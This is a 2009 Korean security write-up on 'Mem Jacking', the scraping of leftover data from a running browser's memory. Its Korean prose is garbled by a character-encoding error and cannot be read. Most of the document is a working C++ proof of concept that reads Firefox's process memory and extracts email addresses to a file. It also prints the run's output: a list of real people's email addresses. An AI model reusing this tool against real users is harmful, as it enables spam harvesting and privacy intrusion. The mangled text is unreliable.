=========================================== << Mem Jacking >> by hkpco(¹ÚÂù¾Ï) ------------------------------- mail - chanam.park@hkpco.kr homepage - http://hkpco.kr/ date - 2009. 1. 24 ------------------------------- =========================================== 1. ¼­·Ð ¾ó¸¶Àü milw0rm¿¡¼­ "Mem - Jacking"( http://milw0rm.com/papers/274 ) À̶ó´Â ±ÛÀ» º¸¾Ò´Ù. ÀÛ¼ºÀÚ°¡ ÀÌ·¯ÇÑ ±â¼ú¸íÀ» ÅÃÇÑ ÀÌÀ¯´Â ±âÁ¸¿¡ ºÒ¸®¿ì´Â Session-Hijacking, Click-Jacking°ú °°Àº ±â¼úµé ó·³ ¾ÇÀÇÀûÀÎ Àǵµ·Î ¸Þ¸ð¸®¸¦ °¡·Îæ´Ù´Â Àǹ̷ΠMem-Jacking À̶ó°í ºÎ¸£°Ô µÇ¾ú´Ù°í »ý°¢ÇÏ¸é µÉ °Í °°´Ù. º» ¹®¼­¿¡¼­´Â Mem-Jacking¿¡ ´ëÇÑ °£·«ÇÑ ¼³¸í, ¹æ¾îÃ¥°ú ÇÔ²² ±×¿¡ ´ëÇÑ ±â¼ú Áõ¸í Äڵ带 Æ÷ÇÔÇÏ°í ÀÖ´Ù. 2. ¿ä¾à ¼³¸í À¥ ºê¶ó¿ìÀú´Â ÄÄÇ»Å͸¦ »ç¿ëÇÔ¿¡ ÀÖ¾î ºüÁú ¼ö ¾ø´Â ÇʼöÀûÀÎ ÇÁ·Î±×·¥ÀÌ´Ù. ³ª´Â ¾î¸±Àû 'ÀÎÅͳÝ' À̶ó°í Çϸé À¥ ºê¶ó¿ìÀú¸¦ ¶°¿Ã¸± ¸¸Å­ ±× À̹ÌÁö°¡ Á÷°áµÇ¾î ÀÖ¾úÀ¸¸ç, ¹üÀ§¸¦ ³ÐÇô ¿À´Ã³¯ ÀÎÅͳÝÀ» ÀÌ¿ëÇÏ´Â »ç¶÷µé¿¡°Ô À¥ ºê¶ó¿ìÀúÀÇ À¯¿ëÇÔ°ú ÀÌ·ç ¸»ÇÒ ¼ö ¾ø´Â ÀåÁ¡µéÀÌ ¾È°ÜÁØ ÆíÀǼºÀº Çѵΰ¡Áö°¡ ¾Æ´Ò °ÍÀÌ´Ù. ±×·¸´Ù¸é ÀÌ À¥ ºê¶ó¿ìÀú¸¦ °ÅÄ¡´Â µ¥ÀÌÅ͵éÀº ¾î¶°ÇÑ °ÍÀÌ ÀÖÀ»±î? »ç¿ëÀÚ ¾ÆÀ̵ð¿Í Æнº¿öµåºÎÅÍ ½ÃÀÛÇؼ­ ¸ÞÀÏ ÁÖ¼Ò, URL ±â·Ï, °Ë»ö Å°¿öµå µî Á¤¸» ´Ù¾çÇÑ Á¤º¸µéÀÌ À¥ ºê¶ó¿ìÀú, ´õ Á¤È®È÷ ¸»Çϸé À¥ ºê¶ó¿ìÀúÀÇ ¸Þ¸ð¸®¸¦ °ÅÄ¥ °ÍÀÌ´Ù. ¹°·Ð Áß¿ä Á¤º¸´Â ¾Ïȣȭ µÇ¾î °ü¸®µÇ±â ¶§¹®¿¡ ¾ÈÀüÇÏ´Ù°í ÇÑ´Ù. ÇÏÁö¸¸, ÇØ´ç µ¥ÀÌÅÍÀÇ »ç¿ëÀ» À§Çؼ­´Â ¾î¿ ¼ö ¾øÀÌ Æò¹® ȹµæÀ» À§ÇÏ¿© º¹È£È­¸¦ °ÅÃÄ¾ß ÇÏ´Â °æ¿ìµµ ÀÖÀ» ¼ö Àֱ⠸¶·ÃÀ̸ç ÀÌ °úÁ¤Àº ´ç¿¬È÷ ¸Þ¸ð¸®°¡ ÀÌ¿ëµÈ´Ù. ±×·±µ¥ ¸¹Àº ¾îÇø®ÄÉÀ̼ǵéÀº ÀÌ·±½ÄÀ¸·Î »ç¿ë µÈ ¸Þ¸ð¸®¸¦ ±ú²ýÇÏ°Ô ÃʱâÈ­ ÇÏ´Â °æ¿ì°¡ µå¹°´Ù. ÀÌ·± °æ¿ì ´Ù¸¥ µ¥ÀÌÅÍ·Î µ¤¾î ¾º¿ì°Å³ª »ç¿ëÇÑ ¸Þ¸ð¸®¸¦ ÇØÁ¦ÇÑ´Ù°í Çصµ Áß¿ä µ¥ÀÌÅÍ°¡ ³²¾ÆÀÖÀ» ¼ö ÀÖ´Ù. Mem-JackingÀº ÀÌ·¯ÇÑ ¹®Á¦Á¡À» ÀÌ¿ëÇÑ °ÍÀÌ´Ù. ´Ù½Ã ÇÑ ¹ø °£´ÜÈ÷ Á¤¸®Çϸé, À¥ ºê¶ó¿ìÀúÀÇ ¸Þ¸ð¸®¸¦ °ÅÄ¡´Â Áß¿äÇÑ Á¤º¸µéÀÌ ¸¹À½¿¡µµ ºÒ±¸ÇÏ°í ÀÌ·¯ÇÑ µ¥ÀÌÅÍÀÇ »ç¿ë ÀÌÈÄ¿¡µµ ¸Þ¸ð¸® Ŭ¸°¾÷À» ÇÏÁö ¾Ê±â ¶§¹®¿¡ ´Ù¾çÇÑ µ¥ÀÌÅÍ°¡ ±×´ë·Î ³²¾ÆÀÖ°Ô µÈ´Ù. À̸¦ ÀÌ¿ëÇؼ­ À¥ ºê¶ó¿ìÀúÀÇ ½ÇÇà µµÁß¿¡ ¸Þ¸ð¸® ½ºÄµÀ» ÅëÇÏ¿© Áß¿ä Á¤º¸µéÀ» ¼öÁýÇÏ´Â ±â¼úÀÌ´Ù. ±×·±µ¥ »ç½Ç ¸Þ¸ð¸®¸¦ ±Ü¾î³»´Â ±â¼úÀº ¿î¿µÃ¼Á¦¸¦ ¸··ÐÇÏ°í ¿À·¡ÀüºÎÅÍ Á¸ÀçÇßÀ¸¸ç ´Ù¸¸ ±× È°¿ë¿¡ Â÷ÀÌ°¡ ÀÖ¾úÀ» »Ó ÀüÇô »õ·Î¿î °ÍÀÌ ¾Æ´Ï´Ù. ¾Æ¹«Æ°, milw0rm¿¡ °ø°³µÈ ¹®¼­¿¡¼­´Â À̸¦ ½ºÆиÓÀÇ ÀÔÀå¿¡¼­ ´Ù·®ÀÇ ¸ÞÀÏ ÁÖ¼Ò ¼öÁý¿¡ ÀÌ¿ëÇÏ´Â ¾ÇÀÇÀûÀÎ ¿¹¸¦ µé¾ú´Âµ¥ ½ÇÁ¦·Î ÇØ´ç ±â¼úÀ» ÀÀ¿ëÇÑ ¾Ç¼ºÄڵ带 Á¦ÀÛÇÑ´Ù¸é ¼öõ, ¼ö¸¸°³ÀÇ ¸ÞÀÏ ÁÖ¼Ò ¼öÁýÀº ±×¸® ¾î·Á¿î Àϵµ ¾Æ´Ï¶ó´Â »ý°¢ÀÌ µç´Ù. 3. ½ÇÁ¦ Àû¿ë ½ÇÇà ÁßÀÎ ÆÄÀ̾îÆø½º(FireFox)ÀÇ ¸Þ¸ð¸®¸¦ ½ºÄµÇÏ¿© .com, .net, .org µµ¸ÞÀÎÀ» Æ÷ÇÔÇÏ´Â ¸ÞÀÏ ÁÖ¼Ò¸¦ ÃßÃâÇÏ´Â ÇÁ·Î±×·¥À» ÅëÇØ Å×½ºÆ®ÇØ º¸ÀÚ. Áߺ¹µÇ´Â µ¥ÀÌÅ͵µ ÀÖ°ÚÁö¸¸ ´ÜÁö ±â¼úÀÇ È®Àθ¸ ÇϸéµÇ¹Ç·Î ±× ºÎºÐ¿¡ ´ëÇÑ Ã³¸®´Â °í·ÁÇÏÁö ¾Ê¾Ò´Ù. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // mem jacking ÇÁ·Î±×·¥ ½ÇÇà C:\>mem_jacking.exe [Mem Jacking] Working [Mem Jacking] Result in C:\mjres.txt [Mem Jacking] 193 Found [Mem Jacking] Completed // °á°ú ÆÄÀÏ È®ÀÎ C:\>type mjres.txt jqs@sun.com mano@mozilla.com ehsan.akhgari@gmail.com contact@cusser.net contact@cusser.net mano@mozilla.com ehsan.akhgari@gmail.com hyatt@netscape.com mconnor@steelgryphon.com . . sspitzer@mozilla.org zeniko@gmail.com doronr@us.ibm.com zeniko@gmail.com hewitt@netscape.com zeniko@gmail.com surkov.alexander@gmail.com . . hanjw2@nate.com caliphos@naver.com hkpco@korea.com vortex8539@hanmail.net vortex8539@hanmail.net 11210210@hanmail.net caliphos@naver.com . . 11210210@hanmail.net caliphos@naver.com hkpco@korea.com vortex8539@hanmail.net seaofchaos@inhaian.net caliphos@naver.com freemail@thawte.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ÃÑ 193°³ÀÇ ¸ÞÀÏ ÁÖ¼Ò¸¦ ã¾ÒÀ¸¸ç °á°ú´Â C:\mjres.txt ÆÄÀÏ¿¡ ÀúÀåµÈ °ÍÀ» º¼ ¼ö ÀÖ´Ù. Áߺ¹µÇ´Â ¸ÞÀÏ ÁÖ¼Òµµ ¸¹Áö¸¸ ÇÊ¿äÇÏ´Ù¸é ÀÌ´Â Á¶±Ý¸¸ ÄÚµå ¼öÁ¤À» °ÅÄ¡¸é(ÇÊ¿äÇÑ »ç¶÷ÀÌ ¾ø±â¸¦ ¹Ù¶õ´Ù) ÇØ°áÇÒ ¼ö ÀÖ´Ù. 4. ¹æ¾îÃ¥ ´Ù¾çÇÑ ¹æ¾îÃ¥À» »ý°¢ÇØ º¼ ¼ö ÀÖ°ÚÁö¸¸ ±Ùº»ÀûÀ¸·Î ƯÁ¤ ¸Þ¸ð¸®ÀÇ »ç¿ëÀÌ ´õÀÌ»ó ÇÊ¿äÇÏÁö ¾ÊÀ» °æ¿ì °¡´ÉÇÑ »¡¸® ÇØ´ç ¸Þ¸ð¸®¸¦ ÃʱâÈ­ ½ÃÄÑÁÖ´Â ¹æ¹ýÀÌ °¡Àå È®½ÇÇÒ °ÍÀÌ´Ù. 5. ¼Ò½º ÄÚµå ´ÜÁö ±â¼úÀû Áõ¸íÀ» À§ÇÑ ÄÚµåÀ̱⠶§¹®¿¡ ¼Óµµ, °£°áÇÔ µî¿¡ Å©°Ô ½Å°æ¾²Áö ¾Ê¾ÒÀ¸¸ç ÄÚµå ¶ÇÇÑ ¸¶À½¿¡ µéÁö ¾ÊÁö¸¸ Proof Of ConceptÀ̶ó´Â ¹Ì¸íÇÏ¿¡ ±×´ë·Î ³²°ÜµÐ´Ù. Âü°í·Î milw0rm¿¡ °ø°³µÈ ¹®¼­¿¡¼­´Â MASMÀ» ÀÌ¿ëÇÏ¿© ºê¶ó¿ìÀúÀÇ ¸Þ¸ð¸®¿¡ .comÀÌ Æ÷ÇÔµÈ ¸ðµç ¹®ÀÚ¿­À» ÃßÃâÇÏ´Â Äڵ带 º¸¿©ÁÖ¾ú´Âµ¥ °á°ú°¡ º°·Î Å©°Ô ¿Í´ÝÁö ¾Ê¾Æ¼­ »õ·Î ÀÛ¼ºÇØ º» °ÍÀÌ´Ù. - Mem_Jacking.cpp - /* Collecting E-mail address using by Mem Jacking by hkpco( chanam.park@hkpco.kr ) http://hkpco.kr/ */ // Comment> I know, this code is very dirty. but I coded for proof of technique. #include #include #include #define BEGIN_ADDR 0x1000 #define END_ADDR 0x70000000 #define FILE_NAME "C:\\mjres.txt" #define Valid "0123456789_.abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@" HANDLE hFile; char *Tail[] = { ".com", ".org", ".net" }; int get_num = 0; bool find_tail( char *pbuf, size_t size ); // Recursive function for searching that find e-mail address char *hk_strfnd( const char *str, const char *x, const size_t sz ); // I made it because strstr function that terminating '\0' character int _tmain( void ) { HWND hwnd; HANDLE ph_fox; DWORD pid, rNum; unsigned long m_cnt = 0; char buff[0x1000 +1] = {0x00,}, *p = NULL; hwnd = FindWindow( _T("MozillaUIWindowClass"), NULL ); if( hwnd == NULL ) { _tprintf( _T("FindWindow() error\n") ); return -1; } GetWindowThreadProcessId( hwnd, &pid ); ph_fox = OpenProcess( PROCESS_VM_READ, TRUE, pid ); if( ph_fox == NULL ) { _tprintf( _T("OpenProcess() error\n") ); return -1; } hFile = CreateFile( _T(FILE_NAME), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); if( hFile == INVALID_HANDLE_VALUE ) { _tprintf( _T("CreateFile() error\n") ); CloseHandle(ph_fox); return -1; } _tprintf( _T("[Mem Jacking] Working\n") ); _tprintf( _T("[Mem Jacking] Result in %s\n"), _T(FILE_NAME) ); for( m_cnt = BEGIN_ADDR ; m_cnt < END_ADDR ; m_cnt+=0x1000 ) { ReadProcessMemory( ph_fox, (unsigned long *)m_cnt, buff, 0x1000, &rNum ); find_tail( buff, 0x1000 ); } CloseHandle(ph_fox); CloseHandle(hFile); _tprintf( _T("[Mem Jacking] %d Found\n"), get_num ); _tprintf( _T("[Mem Jacking] Completed\n") ); return 0; } bool find_tail( char *pbuf, size_t size ) { char buffer[0x1000 +1] = {0x00,}, *p; int cnt, i = -1; int flag, mailornot = 0; DWORD num; size_t cnt_in; memcpy( buffer, pbuf, size ); while( Tail[++i] ) { p = NULL; flag = mailornot = 0; cnt = 0; cnt_in = 0; // initialization for safety p = hk_strfnd( buffer, Tail[i], size ); if( p == NULL ) continue; for( cnt = -1 ;; cnt-- ) { flag = 0; for( cnt_in = 0 ; cnt_in < strlen(Valid) ; cnt_in++ ) { if( (*(p +cnt)) == Valid[cnt_in] ) { flag = 1; if( Valid[cnt_in] == '@' ) mailornot = 1; break; } } if(!flag) break; } // Filtering if there is no account(ex - "@google.com", "@korea.com" strings) if( *(p +cnt +1) == '@' ) mailornot = 0; if( cnt == -1 ) { find_tail( p +4, (p +4) -buffer +1 ); return false; } if(mailornot) { WriteFile( hFile, p +cnt+1, 4 -cnt -1, &num, NULL ); WriteFile( hFile, "\r\n", 2, &num, NULL ); FlushFileBuffers(hFile); get_num++; } find_tail( p +4, (p +4) -buffer +1 ); } return true; } char *hk_strfnd( const char *str, const char *x, const size_t sz ) { int flag; unsigned int cnt, cnt_in; for( cnt = 0 ; cnt < sz-strlen(x)+1 ; cnt++ ) { flag = 0; for( cnt_in = 0 ; cnt_in < strlen(x) ; cnt_in++ ) { if( *(str +cnt+ cnt_in) != *(x +cnt_in) ) { flag = 1; break; } } if( !flag ) return (char *)(str+cnt); } return NULL; }